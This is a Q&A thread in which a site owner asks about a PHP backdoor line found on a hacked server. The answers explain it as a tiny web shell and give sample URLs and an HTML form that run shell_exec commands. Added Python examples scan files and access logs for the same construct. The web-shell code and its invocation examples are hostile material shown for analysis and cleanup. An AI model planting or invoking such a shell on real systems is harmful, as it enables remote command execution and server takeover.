Found codes left by hacker but don't understand what it does
I found a line of script left by the hacker in one of my PHP files. And it reads like this:

<?php
($_=@$_GET[2]).@$_($_POST[1]);
?>

Can anyone please give some hints about what this line of code does? Thank you

Hatband answered 29/10, 2013 at 15:45 Comment(5)
errors are suppressed..? – Gustav
This is used to call PHP functions with a simple URL. Must be removed as soon as possible. – Carpathoukraine
It's a PHP shell. If you rewrite it to <?=($_=@$_GET[2]).@$_($_GET[1])?> the URL file.php?1=shell_exec&2=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. – Susquehanna
In general, it's not worth asking what hacked code does; it's usually obfuscated, and always does something nasty. First thing to do is remove it; restore your backups and make sure you've installed all available security patches for any third-party software you use. If you want to spend more time on it, spend that time working out how to avoid getting hacked again, rather than what the hack actually does. – Inositol
@Inositol actually it can be incredibly helpful to figure out what the code does. If you're being hacked by a script kiddie, you can pwn the pwnr. It's also incredibly useful to know what the code does so that you can mitigate the damage done by the attack. In this case we know that the attacker was executing shell commands... he could have escalated to uid=0. – Awry

As Reeno already said in a comment, it's like a PHP shell.

Explanation

  • Store the GET variable with the key '2' in a variable called $_. Due to PHP's nature of weak typing, we do not need quotes around the number.

    $_=@$_GET[2]
    
  • Treat $_ as a callable function name and execute it with $_POST[1] as the first argument.

    @$_($_POST[1])
    

The @ operators should suppress error logging, see PHP.net: Error Control Operators.

The concatenation operator between the two statements does actually nothing important. It could be rewritten like this:

$_=@$_GET[2];
@$_($_POST[1]);

Use case

Calling arbitrary functions. I won't mention the specific HTTP headers for a successful attack, but this should be fairly easy for every (web) programmer.

Discreditable answered 29/10, 2013 at 16:27 Comment(0)
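Someone cleaning up after this kind of compromise usually wants to find every file that carries the same construction, not only the one that happened to be noticed. The script below is an added Python example, not code from the question or from any answer. It is a heuristic scanner built on regular expressions (not a PHP parser) that flags the three tells this answer describes: a request value copied into a variable that is later called as a function, a superglobal element called directly as the callee, and @-suppressed access to request data. The three PHP sources are constructed for the example; the first is the line from the question and the second is the one-liner variant quoted in a later answer.

```python
import re
from typing import Dict, List

# Constructed sample PHP sources for this example. The first is the line from
# the question, the second the one-liner variant quoted in another answer,
# the third ordinary code that reads request data without ever calling it.
SAMPLES: Dict[str, str] = {
    "infected1.php": "<?php\n($_=@$_GET[2]).@$_($_POST[1]);\n?>\n",
    "infected2.php": "<?= @$_GET['c'](@$_GET['p']); ?>\n",
    "clean.php": "<?php\n$name = htmlspecialchars($_GET['name'] ?? '');\n"
                 "echo \"Hello $name\";\n?>\n",
}

# Building blocks for the heuristics (regular expressions, not a PHP parser).
SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\["
VAR = r"\$[A-Za-z_][A-Za-z0-9_]*"

# $_GET['c'](...): a request value used directly as the callee.
RE_SUPERGLOBAL_CALL = re.compile(SUPERGLOBAL + r"[^\]]*\]\s*\(")
# $x = @$_GET[...]: a request value copied into a variable; scan_source then
# checks whether that variable is called somewhere in the same file.
RE_ASSIGN_FROM_REQUEST = re.compile(r"(" + VAR + r")\s*=\s*@?" + SUPERGLOBAL)
# @$_GET / @$_POST: error suppression applied to request data.
RE_SUPPRESSED_REQUEST = re.compile(r"@\s*\$_(?:GET|POST|REQUEST|COOKIE)\b")


def scan_source(src: str) -> List[str]:
    """Return the sorted list of indicator names found in one PHP source."""
    findings = set()
    if RE_SUPERGLOBAL_CALL.search(src):
        findings.add("superglobal-call")
    for m in RE_ASSIGN_FROM_REQUEST.finditer(src):
        var = m.group(1)
        # The copied value only becomes a callee if the variable is followed
        # by an opening parenthesis somewhere in the file.
        if re.search(re.escape(var) + r"\s*\(", src):
            findings.add("variable-function-call")
    if RE_SUPPRESSED_REQUEST.search(src):
        findings.add("suppressed-superglobal")
    return sorted(findings)


def scan_files(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan several sources and keep only those with at least one indicator."""
    report: Dict[str, List[str]] = {}
    for name, src in files.items():
        found = scan_source(src)
        if found:
            report[name] = found
    return report


if __name__ == "__main__":
    for name, found in scan_files(SAMPLES).items():
        print(f"{name}: {', '.join(found)}")
```

On a real web root you would feed scan_files the contents of every .php file under the document root and review each hit by hand; the patterns are deliberately broad, so legitimate code that copies a request value into a variable and calls it later will also be reported, which is the kind of code worth reviewing anyway.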

I already posted it as a comment since the question was on hold, here now as an answer:

It's a PHP shell. If you rewrite it to <?php ($_=@$_GET[2]).@$_($_GET[1]); ?> the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.

You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.

Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.

/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.

Susquehanna answered 29/10, 2013 at 16:26 Comment(0)
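To go one step beyond the egrep one-liner in the answer above, here is an added Python example (not the answer's own code) that parses Apache combined-format access log lines, keeps every request whose 2= query parameter is a syntactically valid PHP function name, and records the HTTP method of each. The parameter names 1 and 2 come from the code in the question; since the original backdoor takes its argument from the POST body, which an access log never records, the example reports an argument only when it travelled in the query string. The log lines, addresses, paths and timestamps are constructed for the example.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format access log lines for this example.
# Addresses, paths and timestamps are made up; the fourth line is a benign
# request whose "2=" parameter is a page number, not a function name.
LOG_LINES = """\
203.0.113.5 - - [29/Oct/2013:15:40:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Oct/2013:15:40:07 +0000] "POST /uploads/file.php?2=shell_exec HTTP/1.1" 200 312 "-" "curl/7.30.0"
203.0.113.5 - - [29/Oct/2013:15:41:12 +0000] "POST /uploads/file.php?2=system HTTP/1.1" 200 88 "-" "curl/7.30.0"
198.51.100.9 - - [29/Oct/2013:15:42:00 +0000] "GET /catalog.php?page=2&2=10 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
198.51.100.9 - - [29/Oct/2013:15:43:30 +0000] "GET /uploads/file.php?2=phpinfo HTTP/1.1" 200 40210 "-" "Mozilla/5.0"
"""

# Client address, timestamp, request line (method, target) and status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A PHP function name: letters, digits and underscores, not starting with a digit.
FUNC_NAME = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def parse_line(line: str) -> Optional[Dict]:
    """Split one log line into fields; return None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def find_shell_hits(lines: List[str], func_param: str = "2",
                    arg_param: str = "1") -> List[Dict]:
    """Return every request whose func_param value looks like a function name.

    The argument is filled in only when it was part of the query string; for
    the backdoor in the question it is sent by POST and never reaches the
    access log, so 'argument' stays None for those requests.
    """
    hits: List[Dict] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for value in rec["query"].get(func_param, []):
            if FUNC_NAME.match(value):
                hits.append({
                    "ip": rec["ip"],
                    "time": rec["ts"],
                    "method": rec["method"],
                    "path": rec["path"],
                    "function": value,
                    "argument": rec["query"].get(arg_param, [None])[0],
                })
    return hits


def sources(hits: List[Dict]) -> Dict[str, int]:
    """Count hits per client address: a quick view of who drove the shell."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = find_shell_hits(LOG_LINES.splitlines())
    for h in found:
        if h["argument"] is not None:
            arg = h["argument"]
        elif h["method"] == "POST":
            arg = "(argument sent by POST, not in the access log)"
        else:
            arg = "(no argument in query string)"
        print(f'{h["time"]} {h["ip"]} {h["method"]} {h["path"]} -> {h["function"]} {arg}')
    print("requests per source:", sources(found))
```

Read the whole rotated log set (logs*) through find_shell_hits rather than a single file, and treat any hit on a path you did not publish as a sign that the rest of the web root needs the same review; a hit with a POST method tells you a command was run but not which one, exactly the half-picture the answer above describes.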

First of all, you must remove those lines as soon as possible.

This code is used to call PHP functions. To give you an example, your hacker will use this kind of form:

<form method="post" action="http://site.com/page.php?2=shell_exec">
    <input name="1" value="ipconfig -all"/>
    <input type="submit" value="Send"/>
</form>

You'll then get these values:

  • $_ = $_GET[2] = shell_exec
  • $_POST[1] = ipconfig -all
  • $_($_POST[1]) = $_("ipconfig -all") = shell_exec("ipconfig -all")

The @ signs are here to disable errors.

A simpler example would be to use this code:

<?= @$_GET['c'](@$_GET['p']); ?>

With a simple call to http://site.com/page.php?c=shell_exec&p=ipconfig%20-all .

Carpathoukraine answered 29/10, 2013 at 16:34 Comment(1)
It uses GET parameters, not POST. – Rattly
